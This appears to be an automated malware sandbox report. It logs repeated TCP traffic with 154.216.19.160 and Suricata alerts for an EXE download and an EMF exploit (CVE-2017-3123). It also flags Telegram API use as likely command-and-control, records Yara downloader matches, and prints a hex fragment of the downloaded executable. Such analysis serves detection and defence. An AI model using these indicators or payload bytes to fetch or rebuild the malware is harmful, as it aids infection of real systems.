                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 154.216.19.160:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 154.216.19.160:80

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 154.216.19.160:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 154.216.19.160:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2827449 - Severity 1 - ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) : 154.216.19.160:80 -> 192.168.2.22:49163
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Mon, 07 Oct 2024 12:55:51 GMTContent-Type: application/x-msdos-programContent-Length: 686080Connection: keep-aliveLast-Modified: Mon, 07 Oct 2024 06:03:47 GMTETag: "a7800-623dcc8bb8743"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 39 75 03 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6e 0a 00 00 08 00 00 00 00 00 00 4a 8c 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 8b 0a 00 4f 00 00 00 00 a0 0a 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 fc 75 0a 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 6c 0a 00 00 20 00 00 00 6e 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a4 05 00 00 00 a0 0a 00 00 06 00 00 00 70 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 76 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 8c 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 3c 39 00 00 b0 2e 00 00 03 00 00 00 1f 00 00 06 ec 67 00 00 10 0e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 31 00 00 00 01 00 00 11 00 7e 02 00 00 04 02 12 00 6f 16 00 00 0a 16 fe 01 0b 07 2c 16 00 02 73 03 00 00 06 0a 7e 02 00 00 04 02 06 6f 17 00 00 0a 00 00 06 0c 2b 00 08 2a 26 02 28 18 00 00 0a 00 00 2a 42 02 28 18 00 00 0a 00 00 02 03 7d 03 00 00 04 2a 1e 02 7b 03 00 00 04 2a 13 30 01 00 15 00 00 00 02 00 00 11 02 28 04 00 00 06 0a 12 00 fe 16 0c 00 00 02 6f 19 00 00 0a 2a 5a 02 28 04 00 00 06 1e 2e 0b 02 28 04 00 00 06 1d fe 01 2b 01 17 2a 72 02 28 06 00 00 06 2d 12 7e 01 00 00 04 02 28 04 00 00 06 6f 1a 00 00 0a 2b 01 16 2a 00 00 00 13 30 04 00 58 00 00 00 00 00 00 00 73 1b 00 00 0a 25 16 17 6f 1c 00 00 0a 00 25 17 1c 6f 1c 00 